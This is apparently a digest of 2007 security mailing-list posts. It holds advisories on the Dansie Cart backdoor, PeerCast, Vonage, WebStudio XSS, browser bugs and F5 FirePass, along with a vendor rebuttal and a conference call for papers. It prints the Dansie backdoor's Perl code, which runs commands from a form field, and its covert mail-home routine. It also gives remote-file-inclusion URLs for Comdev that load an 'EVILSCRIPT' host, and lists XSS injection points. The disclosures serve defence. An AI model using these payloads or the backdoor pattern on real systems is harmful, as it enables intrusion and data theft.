NOTE: Accessing "/_vti_pvt/service.pwd" outputs : 403 Forbidden

Solution

1) Remove "htimage.exe".
2) Do not use FrontPage, simple enough :)

Dansie Cart Script Exploit Reported

[h0tturk]

Synopsis : This program -deliberately- allows arbitrary commands to be
  executed on the victim server.


One of our clients, while installing and configuring the Dansie Shopping
Cart, ran into difficulty integrating PGP, the shopping cart program, and
our secure server setup.  While trying to assist our client with the cart
and PGP configuration we discovered a couple of things.

The CGI, under certain conditions, sends an email to the author of the
Dansie shopping cart software, '[EMAIL PROTECTED]'.  This is not readily
apparent as the code that handles this transaction incorporates a simple
Caesar Cipher to hide the email address. The cipher is handled via the
subroutine 'there2':

--
sub there2
{
   $_ = "$_[0]";
   tr/a-z0-9/gvibn9wprud2lmx8z3fa4eq15oy06sjc7kth/;
   tr/_/-/;
   tr/\@/\./;
   return $_;
}
---

The call that creates this email address and sends the mail is the
function 'there3'.

---
sub there3
{
   if (($ENV{'OS'} !~ /Windows_NT/i) && ($mailprog) && (-e "$mailprog"))
   {
   $a = &there2('8v59')."\@".
&there2('kte3cv').".".
&there2('ev8');
   $b = &there2('8v59_3jhhzi8');
   pop(@there2);
   pop(@there2);
   $c = &there2("@there2");
   open (TECH, "|$mailprog $a");
   print TECH "To: $a\n";
   print TECH "From: $a\n";
   print TECH "Subject: $b\n\n";
   print TECH "$path3\n";
   print TECH "$ENV{'HTTP_HOST'} $ENV{'SERVER_NAME'}\n";
   print TECH "$c\n";
   print TECH "$e $there\n" if ($e);
   close (TECH);
   }
}
---

The ciphered strings, when passed through 'there2', result in:

  8v59  == tech
  kte3cv== dansie
  ev8   == net
  8v59_3jhhzi8  == tech-support
  $a== [EMAIL PROTECTED]
  $b== Subject: tech-support

This seems curious, but plausible reasons could include insuring License
compliance, or maybe the cart automatically sends this email when an error
occurs. The program definitely goes out of its way to hide the fact that the
mail is being sent.

While going through the rest of the code we discovered a much more
interesting item.

(We've masked out the actual trigger element with question marks)

--
if ( ( ( $FORM{'?'}) && ($ENV{'HTTP_HOST'} !~ /($d)/) ) || (
($FORM{'?'} ) && (!$d) ) )
{
   if ( $ENV{'OS'} )
   {
   system("$FORM{'?'}");
   }
   else
   {
   open(ELIF,"|$FORM{'?'}");
   }
   exit;
}

2007-06-03: PeerCast streaming server submits cleartext password

[mpeg]

Hi there,

peercast also submits the configured password in cleartext. e.g.
http://www.domain.tld:7144/admin?cmd=login&pass=asdfg.jodi.org&submit=Login

well, I have just played a bit around with it, so I assume this is already 
known. Solution might be
to use stunnel.

Have Fun :)
Greetz mpeg

Redlevel Advisory #025 - Vonage VoIP Telephone Adapter Default Misconfiguration

[john]

Vonage VoIP Telephone Adapter Default Misconfiguration

The Vonage VoIP Telephone Adapter device is, by default, accessible from the 
WLAN/internet. The product ships with the default username of 'user' and 
default password of 'user' to access the administrative backend.

Users are suggested to update their passwords immediately. An attacker could 
cause a denial-of-service by uploading broken firmware to the device, or by 
constantly rebooting the device.

John Martinelli
[EMAIL PROTECTED]

http://RedLevel.org
RedLevel.org Security

Re: Buffer overflow in BusinessMail email server system 4.60.00

[iant]

This problem was corrected within 14 days, and a new SMTP server was provided 
on our web site. This was back in 2005, we are now almost TWO YEARS ON, and you 
still claim it is a problem.

You **were** notified of the release of the fix, and we have many other 
confirmations that it is indeed a good fix.

We are now at 4.7 of BusinessMail, and that also still blocks this 
"vulenrability", and yet you continue to publich out of ate dand inaccurate 
information as being the truth.

Kindly update your published information as relevant to reflect the true facts 
of this buglet.

You can download an evaluation BusinessMail system from our web site to test 
this for yourself if you still do not beleive us.

Thank You

WebStudio Multiple XSS Vulnerabilities

[glafkos]

Application:  WebStudio CMS

Vendors Url:  http://www.bdigital.biz

Bug Type: Multiple URL Handling Remote Cross-Site Scripting Vulnerabilities

Exploitation: Remote

Severity: Less Critical 

Solution Status: Unpatched 

Introduction: WebStudio CMS is a web-based CMS system

Google Dork:  "Powered by WebStudio"


Description:

User-supplied input passed via the URL is not properly sanitised before it is 
being returned to the user in index.php?pageid=. This can be exploited to 
execute arbitrary script code in the security context of an affected website, 
as a result the code will be able to access any of the target user's cookies, 
access data recently submitted by the target user via web form to the site, or 
take actions on the site acting as the target user.


PoC:

http://[target]/?pageid=[XSS]
http://[target]/?pageid=[XSS]
http://[target]/?pageid=[XSS]
http://[target]/?pageid=-->[XSS]
http://[target]/[EMAIL PROTECTED]
http://[target]/?pageid=http://[target]/?pageid=[XSS]
http://[target]/index.php?pageid=>'>[XSS]
http://[target]/index.php?pageid=[XSS]
http://[target]/index.php?pageid=[XSS]
http://[target]/index.php?pageid=-->[XSS]
http://[target]/[EMAIL PROTECTED]
http://[target]/index.php?pageid=http://[target]/index.php?pageid=[XSS]


Solution:

There was no vendor-supplied solution at the time of entry.

Edit source code manually to ensure user-supplied input is correctly sanitised.

Filter malicious characters and character sequences via a HTTP proxy or 
firewall with URL filtering capabilities.


Credits:

Glafkos Charalambous
glafkos (at) infosec (dot) org (dot) uk

Information Security Uncensored
InfoSEC.org.uk

Assorted browser vulnerabilities

[Michal Zalewski]

Hello,

Will keep it brief. A couple of browser bugs, fresh from the oven, hand
crafted with love:

1) Title: MSIE page update race condition (CRITICAL)
   Impact   : cookie stealing / setting, page hijacking, memory corruption
   Demo : http://lcamtuf.coredump.cx/ierace/

   ...aka the bait & switch vulnerability.

   When Javascript code instructs MSIE6/7 to navigate away from a page
   that meets same-domain origin policy (and hence can be scriptually
   accessed and modified by the attacker) to an unrelated third-party
   site, there is a window of opportunity for concurrently executed
   Javascript to perform actions with the permissions for the old page,
   but actual content for the newly loaded page, for example:

 - Read or set victim.document.cookie,

 - Arbitrarily alter document DOM, including changing form submission
   URLs, injecting code,

 - Read or write DOM structures that were not fully initialized,
   prompting memory corruption and browser crash.

   This is tested on MSIE6 and MSIE7, fully patched.

2) Title: Firefox Cross-site IFRAME hijacking (MAJOR)
   Impact   : keyboard snooping, content spoofing, etc
   Demo : http://lcamtuf.coredump.cx/ifsnatch/
   Bugzilla : https://bugzilla.mozilla.org/show_bug.cgi?id=382686 [May 30]

   Javascript can be used to inject malicious code, including key-snooping
   event handlers, on pages that rely on IFRAMEs to display contents or
   store state data / communicate with the server.

   This is related to a less severe variant independently reported by
   Ronen Zilberman two weeks earlier (bug 381300).

3) Title: Firefox file prompt delay bypass (MEDIUM)
   Impact   : non-consentual download or execution of files
   Demo : http://lcamtuf.coredump.cx/ffclick2/
   Bugzilla : https://bugzilla.mozilla.org/show_bug.cgi?id=376473 [Apr 04]

   A sequence of blur/focus operations can be used to bypass delay timers
   implemented on certain Firefox confirmation dialogs, possibly enabling
   the attacker to download or run files without user's knowledge or
   consent.

3) Title: MSIE6 URL bar spoofing (MEDIUM)
   Impact   : mimicking an arbitrary site, possibly including SSL data
   Demo : http://lcamtuf.coredump.cx/ietrap2/

   MSIE6 vulnerability, similar but unrelated to my earlier onUnload
   entrapment flaw, allows sites to spoof URL bar data.

   MSIE7 is not affected because of certain high-level changes in the
   browser.

S21Sec-035: F5 FirePass command execution vulnerability

[S21sec Labs]

##

 - S21Sec Advisory -

##

Title:   F5 FirePass command execution vulnerability
   ID:   S21SEC-035-en
Severity:   High - Intrusion
  History:   14.Feb.2007 Vulnerability discovered
 22.Feb.2007 Vendor contacted
Scope:   Linux's shell Command Execution
Platforms:   Linux based Appliance  
   Author:   Leonardo Nve ([EMAIL PROTECTED])
  URL:   http://www.s21sec.com/avisos/s21sec-035-en.txt
  Release:   Public

[ SUMMARY ]

F5's FirePass SSL VPN appliance provides secure access to corporate  
applications and data using a standard web browser.
Delivering outstanding performance, scalability, ease-of-use, and end- 
point security, FirePass helps increase the productivity
of those working from home or on the road while keeping corporate  
data secure.


FirePass provides:

* Automatic detection of security compliant systems, preventing  
infection.
* Automatic integration with the largest number of virus  
scanning and personal firewall solutions in the industry

  (over 100 different AV & Personal Firewall versions).
* Automatic protection from infected file uploads or email  
attachments.
* Automatic re-routing and quarantine of infected or non- 
compliant systems to a self remediation network - reducing

  help desk calls.
* A secure workspace, preventing eavesdropping and theft of  
sensitive data.
* Secure Login with a randomized key entry system, preventing  
keystroke logger snooping.
* Full integration with the FirePass Visual Policy Editor. This  
enables the creation of custom
	  template policies based on the endpoints accessing your network  
and your company's security profile.




[ AFFECTED VERSIONS ]

This vulnerability has been tested in F5 FirePass 4100.


[ DESCRIPTION ]

S21sec has discovered a vulnerability in a F5 FirePass SSL VPN   
script that allows the injection of Linux's shell command under some  
circunstances.
The attacker doesn`t need to be logged in the system in order to  
trigger the exploit


The affected script is:

- my.activation.php3

The variable is:

- username


[ WORKAROUND ]

F5 has published a security advisory at https://tech.f5.com/home/ 
solutions/sol167.html
Additionally, hotfix HF-75705-76003-1 has been issued for supported  
versions of FirePass.
You may download this hotfix or later versions of the hotfix from the  
F5 Networks Downloads site (https://downloads.f5.com/esd/index.jsp).


[ ACKNOWLEDGMENTS ]

This vulnerability has been discovered and researched by:

- Leonardo Nve <[EMAIL PROTECTED]> S21Sec

With thanks to:

- Alberto Moro <[EMAIL PROTECTED]> S21Sec


[ REFERENCES ]

* F5 Firepass
  http://www.f5.com/products/FirePass/



* S21Sec
  http://www.s21sec.com

BCS'07 Call For Papers

[Jim Geovedi]

Dear Bugtraq readers,

The call for papers and conference registration is now open for
BCS'07, our third annual information security & hacking conference.


 From 30 to 31 October 2007, BCS'07 will be held at the Grand Melia
 in Jakarta, Indonesia.


We invite proposals for paper presentations and demonstrations:

Your submission should include:
 1. Name, title, address, email and phone number
 2. Draft of the proposed presentation (in PDF, PowerPoint or Keynote
format), proof of concept for tools and exploits, etc.
 3. Short biography, qualification, occupation, achievement and
affiliations (limit 150 words).
 4. Summary or abstract for your presentation (limit 150 words)
 5. Time (40-60 minutes). Include time for discussion and questions
 6. Technical requirements (video, internet, wireless, audio, etc.)

We do not accept product, service or vendor related presentations.

Please send your proposal to [EMAIL PROTECTED] as soon as possible
and no later than 30 June 2007.

Proposals will be evaluated in the order received; submit early to
maximise your chances of being selected.

Links:
http://www.bellua.net or http://www.bellua.com/bcs/

Pictures from BCS2006:
http://www.bellua.net/asia06.pictures/index.html

Pictures from BCS2005:
http://www.bellua.net/asia05.pictures/index.html

Many thanks,

Jim Geovedi

Comdev eCommerce 4.1 RFI Vulnerability

[johnnytalker]

###
#  
# Comdev eCommerce 4.1 RFI Vulnerability
#
###
# Infomation:-
#
# Scripts:  Comdev eCommerce
# Download: 
http://www.comdevweb.com/downloadfile.php?product=ECOMM41&url=http://share.comdevweb.com/download/ecommerce-4.1.zip
# Version : 4.1
#
#
# Exploit :
#
# 
http://website/oneadmin/ecommerce/sampleecommerce.php?path[docroot]=http://EVILSCRIPT.txt?
#
###
#
# Discoverd By : [L.T.C]
#
###

Comdev Web Blogger 4.1 RFI Vulnerability

[johnnytalker]

###
# 
# Comdev Web Blogger 4.1 RFI Vulnerability
#
###
# Infomation:-
#
# Scripts:  Comdev Web Blogger
# Download: 
http://www.comdevweb.com/downloadfile.php?product=BLOGG41&url=http://share.comdevweb.com/download/blogger-4.1.zip
# Version : 4.1
#
#
# Exploit :
#
# 
http://website/oneadmin/blogger/sampleblogger.php?path[docroot]=http://EVILSCRIPT.txt?
#
###
#
# Discovered By : [L.T.C]
#
###